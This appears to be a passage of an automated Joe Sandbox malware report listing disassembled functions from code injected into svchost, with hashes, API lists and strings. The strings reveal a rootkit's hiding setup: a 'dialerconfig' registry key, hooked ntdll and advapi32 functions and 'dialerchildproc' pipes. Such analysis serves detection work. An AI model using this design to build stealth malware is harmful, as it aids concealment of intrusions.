                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction ID: e7c148938d73b118393facd0308456c1e40248a19777e3d89d8291f9a2c8a452
                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction Fuzzy Hash: 9D313A76205E84CAEB609F60E8403EE7361F788745F54402ADA4D6BBA5EF38C949CB10
                                                    Function 00000158709DD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction ID: 059a4172f76ea96128a6440cafd08da1c107212dcb3790aa4d309b172f3a75cd
                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction Fuzzy Hash: C5315B3A214F84C6DB60CB25E8403DE73A0F7C9799F640126EA9D5BBA5EF38C556CB00
                                                    Function 00000158709D1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                    • API String ID: 106492572-2879589442
                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction ID: 0f6089fd75106e825002abacbaf1900165387074937e0fada7e43ed3f6eff390
                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction Fuzzy Hash: 3371183B314E14D6EB109F72EC4079933A5F7C8B8AF101121DA4E6BB29DE34C956CB40
                                                    Function 00000158709D12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                    • String ID: d
                                                    • API String ID: 2005889112-2564639436
                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction ID: eb3ce238f31fcb04bd06a980f3a210d1e24ed5b83b152061e04dc28651e22d57
                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction Fuzzy Hash: E5513A3B208B84D6EB55CF62E84839A77A1F7C9BDAF144124DA491B729DF38C456CB00
                                                    Function 00000158709D1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                    • API String ID: 4175298099-1975688563
                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction ID: fe178ff9f80e494172ea236cf487610b27fb66f29a12b80d336874847e16e756
                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction Fuzzy Hash: B131AE7E545E4AE0EA04EBA9EC517E43320F7DC346FA9401394493E277AF38865BCB50
                                                    Function 00000158709A6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 227 158709a6910-158709a6916 228 158709a6951-158709a695b 227->228 229 158709a6918-158709a691b 227->229 232 158709a6a78-158709a6a8d 228->232 230 158709a6945-158709a6984 call 158709a6fc0 229->230 231 158709a691d-158709a6920 229->231 247 158709a6a52 230->247 248 158709a698a-158709a699f call 158709a6e54 230->248 233 158709a6922-158709a6925 231->233 234 158709a6938 __scrt_dllmain_crt_thread_attach 231->234 235 158709a6a8f 232->235 236 158709a6a9c-158709a6ab6 call 158709a6e54 232->236 238 158709a6931-158709a6936 call 158709a6f04 233->238 239 158709a6927-158709a6930 233->239 242 158709a693d-158709a6944 234->242 240 158709a6a91-158709a6a9b 235->240 250 158709a6ab8-158709a6aed call 158709a6f7c call 158709a6e1c call 158709a7318 call 158709a7130 call 158709a7154 call 158709a6fac 236->250 251 158709a6aef-158709a6b20 call 158709a7190 236->251 238->242 252 158709a6a54-158709a6a69 247->252 259 158709a69a5-158709a69b6 call 158709a6ec4 248->259 260 158709a6a6a-158709a6a77 call 158709a7190 248->260 250->240 261 158709a6b22-158709a6b28 251->261 262 158709a6b31-158709a6b37 251->262 279 158709a6a07-158709a6a11 call 158709a7130 259->279 280 158709a69b8-158709a69dc call 158709a72dc call 158709a6e0c call 158709a6e38 call 158709aac0c 259->280 260->232 261->262 266 158709a6b2a-158709a6b2c 261->266 267 158709a6b39-158709a6b43 262->267 268 158709a6b7e-158709a6b94 call 158709a268c 262->268 273 158709a6c1f-158709a6c2c 266->273 274 158709a6b45-158709a6b4d 267->274 275 158709a6b4f-158709a6b5d call 158709b5780 267->275 288 158709a6b96-158709a6b98 268->288 289 158709a6bcc-158709a6bce 268->289 282 158709a6b63-158709a6b78 call 158709a6910 274->282 275->282 292 158709a6c15-158709a6c1d 275->292 279->247 300 158709a6a13-158709a6a1f call 158709a7180 279->300 280->279 330 158709a69de-158709a69e5 __scrt_dllmain_after_initialize_c 280->330 282->268 282->292 288->289 297 158709a6b9a-158709a6bbc call 158709a268c call 158709a6a78 288->297 290 158709a6bd0-158709a6bd3 289->290 291 158709a6bd5-158709a6bea call 158709a6910 289->291 290->291 290->292 291->292 309 158709a6bec-158709a6bf6 291->309 292->273 297->289 324 158709a6bbe-158709a6bc6 call 158709b5780 297->324 317 158709a6a21-158709a6a2b call 158709a7098 300->317 318 158709a6a45-158709a6a50 300->318 314 158709a6c01-158709a6c11 call 158709b5780 309->314 315 158709a6bf8-158709a6bff 309->315 314->292 315->292 317->318 329 158709a6a2d-158709a6a3b 317->329 318->252 324->289 329->318 330->279 331 158709a69e7-158709a6a04 call 158709aabc8 330->331 331->279
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                    • API String ID: 190073905-1786718095
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: 2bc89b2b44f4cc9601cd367f7fcf5040b1f2b50bcf0555486a2ee6e897309275
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 0481AFBD708E41C6FA909B659C413D972A0A7CD782F7480259A49BF796DF38C847EF00
                                                    Function 00000158709DCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00000158709DCE37
                                                    • FlsGetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE4C
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE6D
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE9A
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEAB
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEBC
                                                    • SetLastError.KERNEL32 ref: 00000158709DCED7
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF0D
                                                    • FlsSetValue.KERNEL32(?,?,00000001,00000158709DECCC,?,?,?,?,00000158709DBF9F,?,?,?,?,?,00000158709D7AB0), ref: 00000158709DCF2C
                                                      • Part of subcall function 00000158709DD6CC: HeapAlloc.KERNEL32 ref: 00000158709DD721
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF54
                                                      • Part of subcall function 00000158709DD744: HeapFree.KERNEL32 ref: 00000158709DD75A
                                                      • Part of subcall function 00000158709DD744: GetLastError.KERNEL32 ref: 00000158709DD764
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF65
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF76
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                    • String ID:
                                                    • API String ID: 570795689-0
                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction ID: 9975690624174f1e8eecd39a416a149b1b9c960f19d828ddab801993930161a0
                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                    • Instruction Fuzzy Hash: DB4184BC289E4DC1FA6867255D523E932425BCC7B6F740724A8367E7DBED28D8434E80
                                                    Function 00000158709D2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                    • API String ID: 2171963597-1373409510
                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction ID: 9d08b4948e7ab7a7583e3835b8c16d8cf2b2d0085f3f9790f0536a71d5975b49
                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                    • Instruction Fuzzy Hash: 0D21303A618A54C2E710CB25F84439977A0F7C9BE6F640215DA591ABA8CF3CC55ACF00
                                                    Function 00000158709A9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 483 158709a9944-158709a99ac call 158709aa814 486 158709a99b2-158709a99b5 483->486 487 158709a9e13-158709a9e1b call 158709abb48 483->487 486->487 488 158709a99bb-158709a99c1 486->488 490 158709a9a90-158709a9aa2 488->490 491 158709a99c7-158709a99cb 488->491 493 158709a9d63-158709a9d67 490->493 494 158709a9aa8-158709a9aac 490->494 491->490 495 158709a99d1-158709a99dc 491->495 496 158709a9da0-158709a9daa call 158709a8a34 493->496 497 158709a9d69-158709a9d70 493->497 494->493 498 158709a9ab2-158709a9abd 494->498 495->490 499 158709a99e2-158709a99e7 495->499 496->487 511 158709a9dac-158709a9dcb call 158709a6d40 496->511 497->487 500 158709a9d76-158709a9d9b call 158709a9e1c 497->500 498->493 502 158709a9ac3-158709a9aca 498->502 499->490 503 158709a99ed-158709a99f7 call 158709a8a34 499->503 500->496 507 158709a9ad0-158709a9b07 call 158709a8e10 502->507 508 158709a9c94-158709a9ca0 502->508 503->511 514 158709a99fd-158709a9a28 call 158709a8a34 * 2 call 158709a9124 503->514 507->508 519 158709a9b0d-158709a9b15 507->519 508->496 512 158709a9ca6-158709a9caa 508->512 516 158709a9cba-158709a9cc2 512->516 517 158709a9cac-158709a9cb8 call 158709a90e4 512->517 551 158709a9a2a-158709a9a2e 514->551 552 158709a9a48-158709a9a52 call 158709a8a34 514->552 516->496 518 158709a9cc8-158709a9cd5 call 158709a8cb4 516->518 517->516 527 158709a9cdb-158709a9ce3 517->527 518->496 518->527 524 158709a9b19-158709a9b4b 519->524 529 158709a9b51-158709a9b5c 524->529 530 158709a9c87-158709a9c8e 524->530 532 158709a9df6-158709a9e12 call 158709a8a34 * 2 call 158709abaa8 527->532 533 158709a9ce9-158709a9ced 527->533 529->530 534 158709a9b62-158709a9b7b 529->534 530->508 530->524 532->487 536 158709a9d00 533->536 537 158709a9cef-158709a9cfe call 158709a90e4 533->537 538 158709a9b81-158709a9bc6 call 158709a90f8 * 2 534->538 539 158709a9c74-158709a9c79 534->539 547 158709a9d03-158709a9d0d call 158709aa8ac 536->547 537->547 564 158709a9c04-158709a9c0a 538->564 565 158709a9bc8-158709a9bee call 158709a90f8 call 158709aa038 538->565 544 158709a9c84 539->544 544->530 547->496 562 158709a9d13-158709a9d61 call 158709a8d44 call 158709a8f50 547->562 551->552 556 158709a9a30-158709a9a3b 551->556 552->490 568 158709a9a54-158709a9a74 call 158709a8a34 * 2 call 158709aa8ac 552->568 556->552 561 158709a9a3d-158709a9a42 556->561 561->487 561->552 562->496 570 158709a9c7b 564->570 571 158709a9c0c-158709a9c10 564->571 583 158709a9bf0-158709a9c02 565->583 584 158709a9c15-158709a9c72 call 158709a9870 565->584 589 158709a9a76-158709a9a80 call 158709aa99c 568->589 590 158709a9a8b 568->590 576 158709a9c80 570->576 571->538 576->544 583->564 583->565 584->576 593 158709a9df0-158709a9df5 call 158709abaa8 589->593 594 158709a9a86-158709a9def call 158709a86ac call 158709aa3f4 call 158709a88a0 589->594 590->490 593->532 594->593
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction ID: 08ab0671c9424b5081223383289d6080edcd3caa4dd75a7e0d5916fa68029c91
                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                    • Instruction Fuzzy Hash: 8AE16EBA608F40CAEB60DB69DC403DD77A4F799799F204116EE896BB95CF34C492DB00
                                                    Function 00000158709DA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 604 158709da544-158709da5ac call 158709db414 607 158709daa13-158709daa1b call 158709dc748 604->607 608 158709da5b2-158709da5b5 604->608 608->607 609 158709da5bb-158709da5c1 608->609 611 158709da5c7-158709da5cb 609->611 612 158709da690-158709da6a2 609->612 611->612 616 158709da5d1-158709da5dc 611->616 614 158709da963-158709da967 612->614 615 158709da6a8-158709da6ac 612->615 617 158709da9a0-158709da9aa call 158709d9634 614->617 618 158709da969-158709da970 614->618 615->614 619 158709da6b2-158709da6bd 615->619 616->612 620 158709da5e2-158709da5e7 616->620 617->607 630 158709da9ac-158709da9cb call 158709d7940 617->630 618->607 621 158709da976-158709da99b call 158709daa1c 618->621 619->614 623 158709da6c3-158709da6ca 619->623 620->612 624 158709da5ed-158709da5f7 call 158709d9634 620->624 621->617 627 158709da894-158709da8a0 623->627 628 158709da6d0-158709da707 call 158709d9a10 623->628 624->630 634 158709da5fd-158709da628 call 158709d9634 * 2 call 158709d9d24 624->634 627->617 631 158709da8a6-158709da8aa 627->631 628->627 639 158709da70d-158709da715 628->639 636 158709da8ac-158709da8b8 call 158709d9ce4 631->636 637 158709da8ba-158709da8c2 631->637 672 158709da648-158709da652 call 158709d9634 634->672 673 158709da62a-158709da62e 634->673 636->637 652 158709da8db-158709da8e3 636->652 637->617 643 158709da8c8-158709da8d5 call 158709d98b4 637->643 645 158709da719-158709da74b 639->645 643->617 643->652 649 158709da887-158709da88e 645->649 650 158709da751-158709da75c 645->650 649->627 649->645 650->649 653 158709da762-158709da77b 650->653 654 158709da9f6-158709daa12 call 158709d9634 * 2 call 158709dc6a8 652->654 655 158709da8e9-158709da8ed 652->655 657 158709da874-158709da879 653->657 658 158709da781-158709da7c6 call 158709d9cf8 * 2 653->658 654->607 659 158709da900 655->659 660 158709da8ef-158709da8fe call 158709d9ce4 655->660 663 158709da884 657->663 685 158709da804-158709da80a 658->685 686 158709da7c8-158709da7ee call 158709d9cf8 call 158709dac38 658->686 668 158709da903-158709da90d call 158709db4ac 659->668 660->668 663->649 668->617 683 158709da913-158709da961 call 158709d9944 call 158709d9b50 668->683 672->612 689 158709da654-158709da674 call 158709d9634 * 2 call 158709db4ac 672->689 673->672 677 158709da630-158709da63b 673->677 677->672 682 158709da63d-158709da642 677->682 682->607 682->672 683->617 690 158709da80c-158709da810 685->690 691 158709da87b 685->691 705 158709da815-158709da872 call 158709da470 686->705 706 158709da7f0-158709da802 686->706 710 158709da676-158709da680 call 158709db59c 689->710 711 158709da68b 689->711 690->658 695 158709da880 691->695 695->663 705->695 706->685 706->686 714 158709da686-158709da9ef call 158709d92ac call 158709daff4 call 158709d94a0 710->714 715 158709da9f0-158709da9f5 call 158709dc6a8 710->715 711->612 714->715 715->654
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction ID: f3fa1228f9b23b1bab88f1be00c529a69e786049c2ce1459848cac513dec6a52
                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                    • Instruction Fuzzy Hash: D0E1807A648F48CAEB20DF65D8803DD77A0F799799F640115EE896BB96CF34C492CB00
                                                    Function 00000158709DF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction ID: cb0434ac2a4b0d4f8a64736bfb55d34b7dfcd7b844d76ba5a6e5c12046194fd4
                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                    • Instruction Fuzzy Hash: 9441293A359E04D1EA15CB16AC147D63391B7CDBE2F2541299D0DAF7AAEE38C4478B40
                                                    Function 00000158709DD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD087
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0A6
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0CE
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0DF
                                                    • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID: 1%$Y%
                                                    • API String ID: 3702945584-1395475152
                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction ID: 1d2e9aa775ac6edd092d1a246d88b9f5446202352410f6619a6c14a773fb799f
                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                    • Instruction Fuzzy Hash: 9811307878DE4CC1FA6857259D523F971419BCC7A6F78422594292E7DBDE28D4438A00
                                                    Function 00000158709D7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: 3d8f95e5633d4c6b653d59d18f429cffb185ad790c80063b25e37e7c71a7f415
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: 03817E3D688E49C6FA50EB65AC413D9B291ABCD782F744415A9086F7A7FF38C8478F01
                                                    Function 00000158709D9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction ID: 7fb3335a45b0d0e99637cb6ac1d0fd9b443a23753f7729f4e4207a61b16c956a
                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                    • Instruction Fuzzy Hash: 2031D83A35AE44E1EE11EB42AC007D97394B7CCBA2F7906259D1E6F392DF38C4568B10
                                                    Function 00000158709E3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction ID: 5854a10f70b8acde66e217e2d3e673b9bf3bb195df514e6a525a3e7a0ccb6496
                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                    • Instruction Fuzzy Hash: 52118236314F40C6E7508B52FC5435976A0F7CCFE6F244218EA5A9B7A4CF78C9668B80
                                                    Function 00000158709D3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                    • String ID: wr
                                                    • API String ID: 1092925422-2678910430
                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction ID: c1706b2b0473ed2e9d02f1dddf1a74ec365221044fa21d2a3e131ac40444c417
                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction Fuzzy Hash: 60113C3A708F45C2EF549B22E8043A972A1F788B97F644029DE895B765EF3DC916CB04
                                                    Function 00000158709D5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
